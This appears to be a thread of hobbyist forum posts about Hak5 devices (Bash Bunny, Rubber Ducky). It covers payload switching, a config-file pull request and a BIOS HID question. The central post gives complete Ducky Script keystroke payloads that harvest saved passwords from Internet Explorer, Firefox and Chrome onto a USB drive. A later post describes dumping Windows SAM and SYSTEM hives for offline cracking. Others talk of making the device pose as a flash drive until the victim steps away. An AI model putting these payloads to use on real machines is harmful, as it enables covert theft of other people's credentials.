mrt0mat0

Yeah, so after hearing about the new firmware release, I've decided to do basically what Dave-ee said. I will also be moving it to an extension instead of modifying the bash bunny software. that way it won't be wiped going forward. I'll let you guys know when I'm all done. I can't guarantee it will work as I plan though. We'll see

I will create a branch soon, and push it. I'm setting up configuration files to allow to enable it so it doesn't always have to be active if you don't want to. that has created a problem, as each payload is actually moved to tmp and ran from there. i'll have to do the same with the config. once i finish all of that, I don't think i'd be able to abstract the whole functionality, but adding a helper would be possible. my initial install breaks up the bash bunny into smaller pieces. once that's done, you could manipulate the listener and the payload activation independently.

yes. that's what it currently does. it saves about 4 seconds from just popping it out. you'd think it would be instant, but it has to disable dhcp, mounts, and all that stuff, so it takes a bit of time. i'm working on speeding it up. I also want to add a feature that will pause the payload until you hit the switch. allowing you to possibly pretend that it's a usb flash drive, and then when they step away, switch it and make it run the payload. still deciding what would be worth doing.

So, I've made a payload to upgrade the bash bunny to allow for switching on the fly. I'm not posting it yet, because it seems that the PRs are piling up and don't want it lost in the shuffle. i currently have it so that it runs the payload on the switch you switch it to, but feel it could eventually be used to register commands to the script. Would anyone find this useful? Any ideas on other uses detecting the switches could do?

So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.

a quick and dirty way to force a recovery is to delete the bash_bunny.sh - every time it loads, it deletes a counter that is incremented by the system. if that counter makes it to 3, it will force a recovery from a backup partition. ssh root@172.16.64.1 *********** rm bash_bunny.sh

So, the original way the BB works is just fine. copy your files, run. save, done. but why bother copying? With my new "payload" called ConfigPayloads, you can use a config.txt file simply supply the directory of the payload you want to run, and presto manifesto, you're all done. On top of that, the old way left you wondering which payloads you have where. No longer! with one file to show you the directory you are pointing to, you can quickly see your configuration! quickly swap out payloads and easily see which payloads will be ran! The best part is that this change is COMPLETELY BACKWARDS COMPATIBLE! That's right folks! If you want to go back to using the switch1, switch2 folders you can! just rename or remove the handy dandy config.txt and you're right back to basics! Enjoy! https://github.com/hak5/bashbunny-payloads/pull/106 (pull request pending)

the wiki doesn't actually show how to use it. I've seen it done this way: ATTACKMODE HID VID_0X05AC PID_0X021E not even sure if that works. would be nice to have it do an example. hope that helps.

i know ie keeps the files in registry, but they're encrypted. i was going to look up the commands to decrypt to make it a pure "HID" attack, but I got distracted with other things. also, chrome has files you can pull but i'm not 100% on which ones and how i'd decrypt those as well. I know it's possible though

So, I didn't see any examples of this, so I tried my best to get some basic ones down. Now, I only tested this on two systems and they seem to work. the timing for some might need to be tweaked. The biggest issue is that each browser uses different methods, so I made one for each... files on flash drive: iepv.exe, evac.txt Internet Explorer 9 This is actually the biggest cheat, as I just used iepassview but it's very portable so with my twin duck, i just threw it on there and it worked like a dream, except it takes like 10 seconds to run... DEFAULTDELAY 50 DELAY 4000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 200 STRING iepv.exe ENTER DELAY 10000 CTRL s DELAY 200 STRING ie_passes.txt ENTER DELAY 1000 ALT F4 DELAY 200 STRING exit ENTER Firefox this copies two files over key3 and signon. once you have them you can just drop them in a profile and go to the passwords section in firefox DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING cmd ENTER DELAY 200 STRING cd %userprofile% ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \key3.db key3.db ENTER DELAY 200 STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\ TAB STRING \signons.sqlite signons.sqlite ENTER DELAY 200 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: exit: ) ENTER STRING move %userprofile%\key3.db key3.db ENTER DELAY 200 STRING move %userprofile%\signons.sqlite signons.sqlite ENTER STRING exit ENTER Chrome 24 I went to the passwords page, switched all the passwords on manually and screen capped it. The biggest flaw with this one is the password amount. this sample runs 8 passwords. if there are less you have a chance of randomly changing something. if there are more, you don't get all the ones available, which isn't always that big of a deal. this was only tested in chrome 24.0 so it may be different depending on the version. DEFAULTDELAY 50 DELAY 3000 GUI m DELAY 200 CTRL ESC STRING chrome ENTER DELAY 1000 ESCAPE DELAY 500 ALT SPACE STRING x DELAY 200 CTRL l STRING chrome://settings/passwords ENTER DELAY 200 TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB SPACE TAB TAB TAB SHIFT TAB ALT PRINTSCREEN ALT F4 DELAY 400 GUI r STRING mspaint ENTER DELAY 1000 CTRL v DELAY 300 CTRL s DELAY 300 STRING %userprofile%\chrome.png ENTER DELAY 300 ALT f STRING x DELAY 300 CTRL ESC STRING cmd ENTER DELAY 300 STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) ENTER DELAY 300 STRING move %userprofile%\chrome.png chrome.png ENTER DELAY 300 STRING exit ENTER look forward to feedback and improvements

In case anyone is curious, I have my setup so that it uses both the evac.txt check and prior to running scripts, it creates a folder using computer name which works great for multiple attacks without overwriting(unless people have the same computer name). In theory you could loop through similar to the drive name to check for a file and append a number increasing until it has a free space, but meh. I'm currently using the twin duck and it works great for storing. then i just plug my sd into my linux system and use samdump. I'm having two weird issues and I'm not sure if they're related. First, the create part of vssown is failing due to an error, which i don't get the opportunity to copy and paste. next time i'll tweak it so it stops there and i can get the error or just remove the exit, as it's not necessary while i'm testing. The second part is that the SYSTEM file takes 5 minutes + to download to the flash drive. I'm not sure if this relates to the vssown or if it's because i'm copying back to a usb that's also handling the commands or if it's the size, which is only 28mb. It still works, but i'm prefer a *snap* done result.

Ok, so I'm running a command that is taking days (spbin/hashcat) but i don't remember my exact command because i want to figure out the timespan based on the speed and the amount of patterns generated on spbin. Is there a command that i can do(history seems to only work on the console that i typed it on) to see what my current commmand running is. I know i can see which application is running but i need to know the exact command i typed. Any easy commands or tricks? Any help would be appreciated.